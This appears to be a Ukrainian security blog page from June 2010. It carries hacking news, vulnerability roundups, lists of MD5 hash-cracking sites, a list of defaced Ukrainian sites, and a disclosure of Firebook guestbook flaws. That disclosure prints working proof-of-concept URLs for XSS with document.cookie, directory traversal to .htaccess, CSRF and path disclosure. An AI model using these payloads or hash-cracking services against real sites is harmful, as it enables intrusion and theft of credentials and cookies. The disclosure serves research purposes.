Новини: російський хакер, кібершахраї з США та невиявляємі боти

22:49 18.06.2010

Пропоную вашій увазі добірку цікавих новин на тему безпеки.

За повідомленням hackzona.com.ua, в Архангельській області будуть судити хакера за злом сайтів держустанов. Міжрайонним прокурором міста Котласа (Архангельська область) затверджено обвинувальний висновок у кримінальній справі відносно 21-річного Сергія Дашкаєва, який звинувачується у скоєнні злочинів, передбачених ч. 1 ст. 272 КК РФ (неправомірний доступ до охоронюваної законом комп’ютерної інформації).

Встановлено, що Дашкаєв з серпня 2009 по березень 2010 року здійснював взлом офіційних сайтів державних і муніципальних установ та органів, підприємств і організацій, копіював з них інформацію, а також без згоди правовласників вносив в структуру сайтів зміни.

За повідомленням www.bfm.ru, жертвами кібершахраїв з США сталі жителі 60 країн. У США заочно пред’явлені обвинувачення трьом фігурантам справи в кібершахрайстві, що обдурили користувачів на 100 мільйонів доларів. Жертвами зловмисників стали громадяни більш 60 держав, повідомляє управління ФБР по Чикаго.

За версією слідства, обвинувачувані створили компанію Innovative Marketing. Вона була зареєстрована в африканській державі Беліз як продавець антивірусного й іншого програмного забезпечення. “Дочка” Innovative Marketing знаходилася в Києві, вона і була головним офісом компанії. В києвському офісі й створювалися підроблені антивіруси.

За повідомленням hackzona.com.ua, у продажу є “невиявляємі боти”. Лабораторія PandaLabs виявила мережу, в якій продаються боти, що спеціалізуються на соціальних мережах і системах електронної пошти.

На загальнодоступній веб-сторінці викладено докладний каталог програм, націлених на сервіси електронної пошти та соціальні мережі, включаючи Twitter, Facebook, Hi5, MySpace, MyYearBook, YouTube, Tuenti, Friendster, Gmail і Yahoo.

Сайти для пошуку md5 хешей №5

19:18 18.06.2010

Продовжу розповідати вам про сайти для пошуку md5 хешей.

В Інтернеті існують веб сайти для пошуку md5 хешей (як й інших хешей). Тобто вони призначені для взлому md5 хешей, щоб по хешу отримати його значення (у випадку хеша пароля, це дозволить отримати пароль).

До раніше наведених сайтів зверну вашу увагу на наступні:

  • http://www.md5this.com/list.php
  • http://www.rmd5.com
  • http://passcracking.ru (MD5, SHA1 і MySQL хеші)
  • http://hashcrack.com (MD5, SHA1, MySQL, NTLM і LanMan хеші)
  • http://gdataonline.com

В подальшому я продовжу наводити перелік подібних сайтів.

Добірка уразливостей

15:21 18.06.2010

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Cisco Wireless LAN Controllers (деталі)
  • justVisual 2.0 (index.php) <= LFI Vulnerability (деталі)
  • Addonics NAS Adapter FTP Remote Denial of Service (деталі)
  • Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth) (деталі)
  • Multiple Vulnerabilities in CMS faethon (деталі)
  • Memcached and MemcacheDB ASLR Bypass Weakness (деталі)
  • Multiple XSS vulnerabilities in OSSIM 2.2.1 (деталі)
  • SQL Injection Vulnerabilitie in PhotoPost vBGallery 2.5 (деталі)
  • XSS vulnerability in easy page cms (деталі)
  • Joomla Component com_xmap Sql Injection Vulnerability (деталі)

Уразливості на www.paypal.com

23:54 17.06.2010

У листопаді, 13.11.2009, я знайшов Insufficient Anti-automation уразливості на http://www.paypal.com - cайті відомої електронної платіжної системи PayPal. Хоча PayPal і заявляє про те, що слідкує за безпекою власних сайтів, але на необхідність захисту від Insufficient Anti-automation вони зовсів не звернули уваги.

Стосовно сайтів електронних платіжних систем останній раз я писав про уразливість на webmoney.ru.

Insufficient Anti-automation:

https://www.paypal.com/cgi-bin/webscr?cmd=_registration-run
https://www.paypal.com/ewf/f=pps_spf

Форми реєстрації та контакту не мають захисту від автоматизованих запитів (капчі). І хоча при реєстрації для деяких країн PayPal може вимагати SMS-валідацію (що може стати захистом від автоматизованих атак, але лише для деяких країн), то у випадку контактної форми жодних обмежень немає.

Cross Site Scripting атаки та захист від них

22:41 17.06.2010

В презентації Cross Site Scripting Attacks: Xss Exploits And Defense, що була три роки тому розміщена на www.slideshare.net, розміщена однойменна книга, яка вийшла в 2007 році.

Книга Cross Site Scripting Attacks: Xss Exploits and Defense, про яку я вже писав - це перша книга про XSS уразливості. Що була написана групою авторів: Jeremiah Grossman, Robert Hansen, Petko D. Petkov, Anton Rager та Seth Fogie. І з якою ви можете ознайомитися в онлайні.

Обхід захисту в Perl

20:06 17.06.2010

Виявлена можливість обходу захисту в Perl.

Уразливі версії: Perl 5.10.

Обхід захисту в Safe.pm.

Уразливості в Firebook

15:17 17.06.2010

13.04.2010

У вересні, 27.09.2009, я знайшов Cross-Site Request Forgery, Cross-Site Scripting, Directory Traversal та Full path disclosure уразливості в Firebook. Це гостьова книга. Дані уразливості я виявив на сайті exwp.com. Про що найближчим часом повідомлю розробникам.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам веб додатка.

17.06.2010

CSRF:

http://site/path_to_firebook_admin/?URLproxy=http://site;

Можливі CSRF та DoS атаки на інші сайти.

XSS:

http://site/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Приклад XSS на http://firebook.ru.

XSS:

Directory Traversal:

http://site/path_to_firebook_admin/?param=1;show=../.htaccess;
http://site/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html

Full path disclosure:

http://site/path_to_firebook_admin/?param=1;show=param.txt;

http://site/guestbook/index.html?answer=guestbook/guest/1

Уразливі всі версії Firebook.

Похакані сайти №100

22:41 16.06.2010

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://yunona-tom.com (хакером isarock666)
  • http://www.aktiva.ua (хакером SheKkoLik) - 06.06.2010, зараз сайт вже виправлений адмінами
  • http://www.budlim.com (хакером ExcalibuR)
  • http://psiham.org.ua (хакером FeniX) - 04.06.2010, зараз сайт вже виправлений адмінами
  • http://www.school29.poltava.ua (хакером Y0u_W3rY)

Численні уразливості в Microsoft Internet Explorer

20:14 16.06.2010

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 5.01, 6, 7 і 8 на Windows 2000 Server, Windows 2000 Professional, Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Міжсайтовий скриптінг, витік інформації, численні пошкодження пам’яті.

  • Microsoft Internet Explorer Stylesheet Array Removal Remote Code Execution Vulnerability (деталі)
  • Microsoft Security Bulletin MS10-035 - Critical Cumulative Security Update for Internet Explorer (982381) (деталі)

Добірка уразливостей

15:06 16.06.2010

В даній добірці уразливості в веб додатках:

  • Multiple Vulnerabilities in Cisco ASA Adaptive Security Appliance and Cisco PIX Security Appliances (деталі)
  • Pulse CMS Arbitrary File Writing Vulnerability (деталі)
  • Instant CMS <= 1.1rc3 Admin (Auth Bypass) Vulnerability (деталі)
  • Joomla component com_universal <= Remote File Inclusion Vulnerability exploit (деталі)
  • Chance-i Techno Vision Security System - Directory Traversal File Download (деталі)
  • Precidia Ether232 Memory Corruption (деталі)
  • Aris AGX agXchange ESM Cross Site Scripting Vulnerability (деталі)
  • There is a Permanent-type Cross-Site Vulnerability in “Personal Signature” in all version of Discuz! (деталі)
  • Multiple Vulnerabilities in EASY Enterprise DMS (деталі)
  • Interactivefx.ie CMS SQL Injection Vulnerability (деталі)